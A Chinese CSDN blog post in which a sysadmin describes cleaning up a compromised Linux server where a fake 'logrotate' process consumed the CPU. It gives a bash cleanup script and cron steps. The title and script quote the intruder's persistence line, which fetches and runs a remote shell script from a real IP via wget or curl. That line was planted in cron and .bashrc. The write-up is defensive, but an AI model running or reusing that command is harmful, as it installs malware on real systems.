linux服务器被入侵,出现@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://118

已于 2024-04-10 18:41:58 修改
阅读量652 收藏 4
点赞数 9
文章标签: 服务器 linux 安全
于 2024-04-10 10:08:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45621643/article/details/137583271
版权

1.服务器速度非常慢,使用top命令查看cpu占比,发现logrotate占据超100%

在这里插入图片描述

2.使用 ps -ef|grep logrotate命令查看进程

在这里插入图片描述

3.因为总是出现,所以猜测是否被入侵,通过查找发现了木马执行的脚本文件地址

在这里插入图片描述
删除该脚本文件(后来才知道:名字是多变的 记录名字没用)
参考文章:

https://blog.csdn.net/qq32933432/article/details/135408156

4.一开始的解决方法是编写定时任务执行杀死进程的脚本

4.1 编写脚本,地址为 /usr/local/software/ship/sadmin/killlog/killnolog.sh

脚本的作用是:发现进程名为logrotate的非本次查询的所有进程PID并用空格分割,发现存在PID即进行删除,并清除病毒产生的定时任务,最后查看是否删除完毕

#!/bin/bash  
process_name=logrotate
#查找并杀死进程名 
PID=`ps -ef |grep $process_name|grep -v grep|awk '{print $2}'|xargs`
save_file="/usr/local/software/ship/sadmin/killlog/killlog.log"
current_time=$(date "+%Y-%m-%d %H:%M:%S")
#判断进程号是否存在
if [[ -z $PID ]]; then
    echo -e "\n\n\n$current_time】暂无可删除的$process_name记录" >> $save_file
else
    kill -9 $PID
    echo -e "\n\n\n$current_time】已删除$process_name的【$PID】进程" >> $save_file
    #删除自动注入的定时脚本任务
    cron_name="source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)"
    del_result=`(crontab -l | grep -v "$cron_name") | crontab -`
    result=`crontab -l`
    echo -e "当前的定时任务为:$result" >> $save_file
    PID_NOW=`ps -ef |grep $process_name|grep -v grep|awk '{print $2}'|xargs`
    echo -e "-------------------当前$process_name有【$PID_NOW】进程" >> $save_file
fi

4.2 crontab -e 进入编写执行定时任务(每分钟执行一次)

发现病毒也插入了定时任务
在这里插入图片描述
删除该定时任务,编写自己的定时任务

*/1 * * * * /usr/local/software/ship/sadmin/killlog/killnolog.sh

使用crontab -l可查看存在的定时任务,没有病毒的定时任务即可
在这里插入图片描述

5.后来发现了比较彻底版的解决方法

5.1 病毒在环境变量(~/.bashrc)中添加的下载命令,除非特殊需求,一般我们不在这个环境变量配置的文件里面写这种命令

这是之前还有病毒下载命令的文件
在这里插入图片描述
删除这句话 然后重新source一下就好了

(之前有过source /etc/profile的经验,这个非本人解决,所以猜测是source ~/.bashrc这个命令)

cd ~
ls -la
vim .bashrc

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

卫庄大人℡
关注
  • 9
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Terrain data:wget -r -A .dat,.graph http://proland.inrialpes.fr/data/
06-21
瓦片数据,用于proland(http://proland.inrialpes.fr/),内网下载地址
记一次服务器入侵(木马,挖矿)的排查过程
诺浅的专栏
01-05 3501
阿里云安全中心报告了告警信息,同时手机短信、邮件、电话也接收到了来自阿里云的风险通知,感觉这方面阿里云还是不错。
进行病毒查杀/5月服务器遭遇logrotate病毒的查杀过程_0基础信息安全教学
2401_84915584的博客
05-29 985
现象:SSH失败、CPU满转五一回来第一天早上,同事反馈服务器ssh登录不上,一直处于登录中状态。于是进入云服务器控制台,CPU打满状态
curl 命令详解
热门推荐
Lakers2015的博客
01-10 3万+
curl 命令
Linux系统的LOG日志文件及入侵后日志的清除
RTC hacker
10-25 1833
<br />下面的文章是了解系统日志是看到别人写的,现在贴出来为了使自己记住没有掌握的Linux功能。<br />-------------<br />文档目录<br />-------------<br />1 什么是syslogd<br />2 配置syslogd的说明<br />3 syslogd和系统中服务配置中日志的关系<br />4 什么是logrotate<br />5 配置logrotate的说明<br />-------------<br />文档正文<br />-------------
病毒把你搞烦了?安全盾和组策略帮你解决一切
cjwid的专栏
01-27 1688
来了飞扬很久了,也没有发过有意义的帖子,现在的帖子数都是以前在绝对的时候发的,那时很有激情,但没有一点水份.今天写点东西,就当是自己对飞扬尽一点点力吧.现在的病毒日益泛滥,杀毒软件的弊端已经暴露,所谓的特征码时代已经过去,随之而来的是主动防御时代,典型的就是hips类型软件,hips简单点说就是主动防御,具体解释如下http://zhidao.baidu.com/question/30757279
[问题已处理]-阿里云服务器种了挖矿病毒aliyun.one
爷来辣的博客
11-30 3544
小伙伴服务器现象 是cpu爆高.但是从top itop等看不出系统哪有问题. 登录如下 top 查看crontab 发现种了木马 通过redis植入(没设置密码) hosts crontab等 都被修改的一塌糊涂.尝试修改crontab 任务,还没有修改完 就被覆盖了.无法清空crontab.到处都有这个脚本的影子,应该无时无刻在更新脚本 同步脚本吧. ...
go1.13.4.linux-amd64.tar.gz
11-08
标题“go1.13.4.linux-amd64.tar.gz”指的是Go编程语言的1.13.4版本的Linux AMD64架构的二进制发行版,被压缩成一个tar.gz文件。这个文件通常包含Go语言的完整编译器、解释器和其他必要的工具,供在64位Linux系统上...
从根源上解决libc.so.6版本问题 /lib64/libc.so.6:version ‘GLIBC_XXX’ not found
01-09
不知道你们是不是有时候也跟我一样,在安装完python某些包的时候,在import的时候总会报错 libc.so.6的版本问题,在网上查找...wget http://ftp.gnu.org/gnu/glibc/glibc-2.19.tar.gz 剩下就编译安装: tar -xf glibc-
TwitterNER:Twitter为WNUT 2016命名实体提取http://noisy-text.github.io2016ner-shared-task.html
02-06
推特 Twitter将WNUT 2016的实体提取命名为并在WNUT COLING 2016上发布了相应的研讨会论文,标题为由安装pip install -r requirements.txtcd datawget ...用法$ cd NoisyNLP$ python>>> from run_ner import TwitterNER>...
附件 wget-1.20.3-win64.zip
01-24
在Windows系统中,虽然原生不包含wget,但可以通过安装第三方软件,如“wget-1.20.3-win64.zip”这样的预编译版本来使用。这个压缩包文件提供了wget的64位Windows版本,适用于处理大型文件下载或在Windows环境下进行...
VPS拨号服务器:独享的高效与安全
qq_34245974的博客
07-06 527
本文将深入探讨VPS拨号服务器的独享特性,以及它如何提供更高效的服务和更强的安全保障。总之,VPS拨号服务器的独享特性为用户提供了一个高效、安全且灵活的网络环境,特别适合那些对服务器性能和安全性有高要求的业务需求。随着技术的不断进步,我们有理由相信,VPS拨号服务器将在未来的互联网架构中扮演越来越重要的角色。VPS拨号服务器是一种特殊的服务器,它结合了传统的VPS功能与动态IP地址分配能力。数据隔离:独享服务器保证了数据的隔离性,降低了数据泄露的风险。自定义安全策略:可以根据业务需求实施定制化的安全措施。
Linux多进程和多线程(五)进程间通信-消息队列
gopher9511的博客
07-03 700
TOCTOC。
Linux系统的介绍和常用命令
weixin_65175398的博客
07-07 472
Linux是一个开源的类Unix操作系统,由Linux内核、GNU工具及其他组件组成。它最初由Linus Torvalds于1991年发布,如今已成为服务器、超级计算机、桌面系统和嵌入式设备中广泛使用的操作系统之一。Linux因其安全性、稳定性和灵活性而受到广泛欢迎,特别是在开发和生产环境中。
【qt】TCP的监听 (设置服务器IP地址和端口号)
最新发布
qq_74047911的博客
07-07 113
当一个TCP服务器程序启动时,它会绑定到一个特定的IP地址和一个端口号上,以便可以接收来自该IP地址和端口号的传入连接请求.我们是从下拉框选的,都是QString类型,我们要进行转换.端口号可以自己设置,范围在0~65535也就是两个字节.但是0~1024一般不可以设置,操作系统用了已经.所以我们要先来获取主机的IP地址和设置端口号.TCP监听是在自己的IP地址上进行的。(),参数是ip地址和端口号.()来获取服务器的ip地址。()来获取服务器的地址.协议,我们需要使用到。获取到主机的IP地址。
什么是独立服务器
wanhengwangluo的博客
07-04 316
独立服务器是指一个单独的物理服务器,整体的硬件设施都是独立存在的,有着强大的性能,只需要运行用户个人的数据信息,并且可以享受到独立服务器的硬件与软件,当网站有着大量的用户进行访问或者是需要运行大型的软件时,独立服务器的稳定性足以支撑,能够保证用户极高的体验感。电脑通常是用来进行日常的家庭办公,而独立服务器则是用于托管在线网站或者是应用程序上,与虚拟服务器相比较,独立服务器是完全独立控制的,可以根据企业自身的业务需求来选择不同的服务器配置,有着一定的灵活性,并且能够在不同的环境下进行工作。
Android使用http加载自建服务器静态网页
知道这个有什么用?
07-04 378
最终效果如下图,成功加载了电脑端的静态网页内容,这是一个xml文件。
【计算机网络】应用层(作业)
Elena's Blog
07-02 936
A。
wget -O /etc/yum.repos.d/epel.repo http://mirrors.aliyun.com/repo8
08-27
这个命令是用来使用wget工具下载一个名为epel.repo的文件,并将其保存到/etc/yum.repos.d/目录下。文件的下载地址是http://mirrors.aliyun.com/repo8。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [CentOS8 / CentOS7 yum源最新修改搭建 2022.3.1](https://blog.csdn.net/lqzixi/article/details/123217855)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [CentOS下yum命令报错File contains no section headers. file: file:///etc/yum.repos.d/](https://blog.csdn.net/xiongIT/article/details/127705053)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Centos7同步阿里yum仓库搭建yum私有仓库](https://download.csdn.net/download/weixin_38733885/14885815)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值